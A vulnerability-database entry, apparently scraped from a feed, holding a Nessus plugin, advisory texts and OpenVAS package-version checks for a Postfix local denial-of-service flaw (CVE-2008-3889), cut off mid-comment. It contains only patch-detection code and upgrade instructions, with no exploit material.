ID GENTOO_GLSA-200809-09.NASL Type nessus Reporter This script is Copyright (C) 2008-2021 Tenable Network Security, Inc. Modified 2008-09-22T00:00:00
Description
The remote host is affected by the vulnerability described in GLSA-200809-09
(Postfix: Denial of Service)
It has been discovered than Postfix leaks an epoll file descriptor when
executing external commands, e.g. user-controlled $HOME/.forward or
$HOME/.procmailrc files. NOTE: This vulnerability only concerns Postfix
instances running on Linux 2.6 kernels.
Impact :
A local attacker could exploit this vulnerability to reduce the
performance of Postfix, and possibly trigger an assertion, resulting in
a Denial of Service.
Workaround :
Allow only trusted users to control delivery to non-Postfix commands.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Gentoo Linux Security Advisory GLSA 200809-09.
#
# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.
# and licensed under the Creative Commons - Attribution / Share Alike
# license. See http://creativecommons.org/licenses/by-sa/3.0/
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(34248);
script_version("1.15");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/06");
script_cve_id("CVE-2008-3889");
script_xref(name:"GLSA", value:"200809-09");
script_name(english:"GLSA-200809-09 : Postfix: Denial of Service");
script_summary(english:"Checks for updated package(s) in /var/db/pkg");
script_set_attribute(
attribute:"synopsis",
value:
"The remote Gentoo host is missing one or more security-related
patches."
);
script_set_attribute(
attribute:"description",
value:
"The remote host is affected by the vulnerability described in GLSA-200809-09
(Postfix: Denial of Service)
It has been discovered than Postfix leaks an epoll file descriptor when
executing external commands, e.g. user-controlled $HOME/.forward or
$HOME/.procmailrc files. NOTE: This vulnerability only concerns Postfix
instances running on Linux 2.6 kernels.
Impact :
A local attacker could exploit this vulnerability to reduce the
performance of Postfix, and possibly trigger an assertion, resulting in
a Denial of Service.
Workaround :
Allow only trusted users to control delivery to non-Postfix commands."
);
script_set_attribute(
attribute:"see_also",
value:"https://security.gentoo.org/glsa/200809-09"
);
script_set_attribute(
attribute:"solution",
value:
"All Postfix 2.4 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose '>=mail-mta/postfix-2.4.9'
All Postfix 2.5 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose '>=mail-mta/postfix-2.5.5'"
);
script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:P");
script_cwe_id(20);
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:postfix");
script_set_attribute(attribute:"cpe", value:"cpe:/o:gentoo:linux");
script_set_attribute(attribute:"patch_publication_date", value:"2008/09/19");
script_set_attribute(attribute:"plugin_publication_date", value:"2008/09/22");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.");
script_family(english:"Gentoo Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/Gentoo/release", "Host/Gentoo/qpkg-list");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("qpkg.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Gentoo/release")) audit(AUDIT_OS_NOT, "Gentoo");
if (!get_kb_item("Host/Gentoo/qpkg-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
flag = 0;
if (qpkg_check(package:"mail-mta/postfix", unaffected:make_list("ge 2.4.9", "ge 2.5.5"), vulnerable:make_list("lt 2.4.9", "lt 2.5.5"))) flag++;
if (flag)
{
if (report_verbosity > 0) security_note(port:0, extra:qpkg_report_get());
else security_note(0);
exit(0);
}
else
{
tested = qpkg_tests_get();
if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
else audit(AUDIT_PACKAGE_NOT_INSTALLED, "Postfix");
}
{"id": "GENTOO_GLSA-200809-09.NASL", "bulletinFamily": "scanner", "title": "GLSA-200809-09 : Postfix: Denial of Service", "description": "The remote host is affected by the vulnerability described in GLSA-200809-09\n(Postfix: Denial of Service)\n\n It has been discovered than Postfix leaks an epoll file descriptor when\n executing external commands, e.g. user-controlled $HOME/.forward or\n $HOME/.procmailrc files. NOTE: This vulnerability only concerns Postfix\n instances running on Linux 2.6 kernels.\n \nImpact :\n\n A local attacker could exploit this vulnerability to reduce the\n performance of Postfix, and possibly trigger an assertion, resulting in\n a Denial of Service.\n \nWorkaround :\n\n Allow only trusted users to control delivery to non-Postfix commands.", "published": "2008-09-22T00:00:00", "modified": "2008-09-22T00:00:00", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, "href": "https://www.tenable.com/plugins/nessus/34248", "reporter": "This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.", "references": ["https://security.gentoo.org/glsa/200809-09"], "cvelist": ["CVE-2008-3889"], "type": "nessus", "lastseen": "2021-01-07T10:52:24", "edition": 24, "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-3889"]}, {"type": "ubuntu", "idList": ["USN-642-1"]}, {"type": "gentoo", "idList": ["GLSA-200809-09"]}, {"type": "openvas", "idList": ["OPENVAS:61646", "OPENVAS:860419", "OPENVAS:830635", "OPENVAS:840227", "OPENVAS:1361412562310830635", "OPENVAS:860510"]}, {"type": "nessus", "idList": ["SUSE_POSTFIX-5603.NASL", "SUSE_11_0_POSTFIX-080912.NASL", "UBUNTU_USN-642-1.NASL", "POSTFIX_EPOLL_LOCAL_DOS.NASL", "MANDRIVA_MDVSA-2008-190.NASL", "FEDORA_2008-8593.NASL", "FEDORA_2008-8595.NASL"]}, {"type": "seebug", "idList": ["SSV:9519", "SSV:17332", "SSV:65714"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:76131FFFA1F8FA883A5D3BB3A352DC3C"]}, {"type": "fedora", "idList": ["FEDORA:71804208749", "FEDORA:5F8CF208974"]}], "modified": "2021-01-07T10:52:24", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-01-07T10:52:24", "rev": 2}, "vulnersScore": 5.8}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200809-09.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(34248);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2008-3889\");\n script_xref(name:\"GLSA\", value:\"200809-09\");\n\n script_name(english:\"GLSA-200809-09 : Postfix: Denial of Service\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200809-09\n(Postfix: Denial of Service)\n\n It has been discovered than Postfix leaks an epoll file descriptor when\n executing external commands, e.g. user-controlled $HOME/.forward or\n $HOME/.procmailrc files. NOTE: This vulnerability only concerns Postfix\n instances running on Linux 2.6 kernels.\n \nImpact :\n\n A local attacker could exploit this vulnerability to reduce the\n performance of Postfix, and possibly trigger an assertion, resulting in\n a Denial of Service.\n \nWorkaround :\n\n Allow only trusted users to control delivery to non-Postfix commands.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200809-09\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Postfix 2.4 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=mail-mta/postfix-2.4.9'\n All Postfix 2.5 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=mail-mta/postfix-2.5.5'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:P\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:postfix\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/09/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/09/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"mail-mta/postfix\", unaffected:make_list(\"ge 2.4.9\", \"ge 2.5.5\"), vulnerable:make_list(\"lt 2.4.9\", \"lt 2.5.5\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:qpkg_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Postfix\");\n}\n", "naslFamily": "Gentoo Local Security Checks", "pluginID": "34248", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:postfix"], "scheme": null}
{"cve": [{"lastseen": "2020-10-03T11:51:01", "description": "Postfix 2.4 before 2.4.9, 2.5 before 2.5.5, and 2.6 before 2.6-20080902, when used with the Linux 2.6 kernel, leaks epoll file descriptors during execution of \"non-Postfix\" commands, which allows local users to cause a denial of service (application slowdown or exit) via a crafted command, as demonstrated by a command in a .forward file.", "edition": 3, "cvss3": {}, "published": "2008-09-12T16:56:00", "title": "CVE-2008-3889", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-3889"], "modified": "2018-10-11T20:50:00", "cpe": ["cpe:/a:postfix:postfix:2.4.8", "cpe:/a:postfix:postfix:2.4.7", "cpe:/a:postfix:postfix:2.4.6", "cpe:/a:postfix:postfix:2.5.1", "cpe:/a:postfix:postfix:2.5.2", "cpe:/a:postfix:postfix:2.4.4", "cpe:/a:postfix:postfix:2.6", "cpe:/a:postfix:postfix:2.5.3", "cpe:/a:postfix:postfix:2.4.3", "cpe:/a:postfix:postfix:2.4.0", "cpe:/a:postfix:postfix:2.4", "cpe:/a:postfix:postfix:2.4.5", "cpe:/a:postfix:postfix:2.4.1", "cpe:/a:postfix:postfix:2.4.2"], "id": "CVE-2008-3889", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3889", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:postfix:postfix:2.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.4:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.6:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.4.5:*:*:*:*:*:*:*"]}], "ubuntu": [{"lastseen": "2020-07-09T00:24:05", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3889"], "description": "Wietse Venema discovered that Postfix leaked internal file descriptors \nwhen executing non-Postfix commands. A local attacker could exploit \nthis to cause Postfix to run out of descriptors, leading to a denial \nof service.", "edition": 5, "modified": "2008-09-10T00:00:00", "published": "2008-09-10T00:00:00", "id": "USN-642-1", "href": "https://ubuntu.com/security/notices/USN-642-1", "title": "Postfix vulnerability", "type": "ubuntu", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:11", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3889"], "description": "### Background\n\nPostfix is Wietse Venema's mailer that attempts to be fast, easy to administer, and secure, as an alternative to the widely-used Sendmail program. \n\n### Description\n\nIt has been discovered than Postfix leaks an epoll file descriptor when executing external commands, e.g. user-controlled $HOME/.forward or $HOME/.procmailrc files. NOTE: This vulnerability only concerns Postfix instances running on Linux 2.6 kernels. \n\n### Impact\n\nA local attacker could exploit this vulnerability to reduce the performance of Postfix, and possibly trigger an assertion, resulting in a Denial of Service. \n\n### Workaround\n\nAllow only trusted users to control delivery to non-Postfix commands. \n\n### Resolution\n\nAll Postfix 2.4 users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=mail-mta/postfix-2.4.9\"\n\nAll Postfix 2.5 users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=mail-mta/postfix-2.5.5\"", "edition": 1, "modified": "2008-09-19T00:00:00", "published": "2008-09-19T00:00:00", "id": "GLSA-200809-09", "href": "https://security.gentoo.org/glsa/200809-09", "type": "gentoo", "title": "Postfix: Denial of Service", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-12-04T11:27:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3889"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-642-1", "modified": "2017-12-01T00:00:00", "published": "2009-03-23T00:00:00", "id": "OPENVAS:840227", "href": "http://plugins.openvas.org/nasl.php?oid=840227", "type": "openvas", "title": "Ubuntu Update for postfix vulnerabilities USN-642-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_642_1.nasl 7969 2017-12-01 09:23:16Z santu $\n#\n# Ubuntu Update for postfix vulnerabilities USN-642-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Wietse Venema discovered that Postfix leaked internal file descriptors\n when executing non-Postfix commands. A local attacker could exploit\n this to cause Postfix to run out of descriptors, leading to a denial\n of service.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-642-1\";\ntag_affected = \"postfix vulnerabilities on Ubuntu 7.10 ,\n Ubuntu 8.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-642-1/\");\n script_id(840227);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-23 10:59:50 +0100 (Mon, 23 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"USN\", value: \"642-1\");\n script_cve_id(\"CVE-2008-3889\");\n script_name( \"Ubuntu Update for postfix vulnerabilities USN-642-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"postfix-cdb\", ver:\"2.5.1-2ubuntu1.2\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-ldap\", ver:\"2.5.1-2ubuntu1.2\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-mysql\", ver:\"2.5.1-2ubuntu1.2\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-pcre\", ver:\"2.5.1-2ubuntu1.2\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-pgsql\", ver:\"2.5.1-2ubuntu1.2\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix\", ver:\"2.5.1-2ubuntu1.2\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-dev\", ver:\"2.5.1-2ubuntu1.2\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-doc\", ver:\"2.5.1-2ubuntu1.2\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU7.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"postfix-cdb\", ver:\"2.4.5-3ubuntu1.3\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-ldap\", ver:\"2.4.5-3ubuntu1.3\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-mysql\", ver:\"2.4.5-3ubuntu1.3\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-pcre\", ver:\"2.4.5-3ubuntu1.3\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-pgsql\", ver:\"2.4.5-3ubuntu1.3\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix\", ver:\"2.4.5-3ubuntu1.3\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-dev\", ver:\"2.4.5-3ubuntu1.3\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-doc\", ver:\"2.4.5-3ubuntu1.3\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-04-09T11:38:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3889"], "description": "Check for the Version of postfix", "modified": "2018-04-06T00:00:00", "published": "2009-04-09T00:00:00", "id": "OPENVAS:1361412562310830635", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310830635", "type": "openvas", "title": "Mandriva Update for postfix MDVSA-2008:190 (postfix)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for postfix MDVSA-2008:190 (postfix)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability in Postfix 2.4 and later was discovered, when\n running on Linux kernel 2.6, where a local user could cause a denial\n of service due to Postfix leaking the epoll file descriptor when\n executing non-Postfix commands (CVE-2008-3889).\n\n The updated packages have been patched to correct this issue.\";\n\ntag_affected = \"postfix on Mandriva Linux 2008.0,\n Mandriva Linux 2008.0/X86_64,\n Mandriva Linux 2008.1,\n Mandriva Linux 2008.1/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2008-09/msg00007.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.830635\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 14:26:37 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"MDVSA\", value: \"2008:190\");\n script_cve_id(\"CVE-2008-3889\");\n script_name( \"Mandriva Update for postfix MDVSA-2008:190 (postfix)\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of postfix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2008.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libpostfix1\", rpm:\"libpostfix1~2.4.5~2.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix\", rpm:\"postfix~2.4.5~2.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-ldap\", rpm:\"postfix-ldap~2.4.5~2.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-mysql\", rpm:\"postfix-mysql~2.4.5~2.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-pcre\", rpm:\"postfix-pcre~2.4.5~2.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-pgsql\", rpm:\"postfix-pgsql~2.4.5~2.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64postfix1\", rpm:\"lib64postfix1~2.4.5~2.2mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2008.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libpostfix1\", rpm:\"libpostfix1~2.5.1~2.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix\", rpm:\"postfix~2.5.1~2.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-ldap\", rpm:\"postfix-ldap~2.5.1~2.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-mysql\", rpm:\"postfix-mysql~2.5.1~2.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-pcre\", rpm:\"postfix-pcre~2.5.1~2.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-pgsql\", rpm:\"postfix-pgsql~2.5.1~2.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64postfix1\", rpm:\"lib64postfix1~2.5.1~2.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3889"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200809-09.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:61646", "href": "http://plugins.openvas.org/nasl.php?oid=61646", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200809-09 (postfix)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU 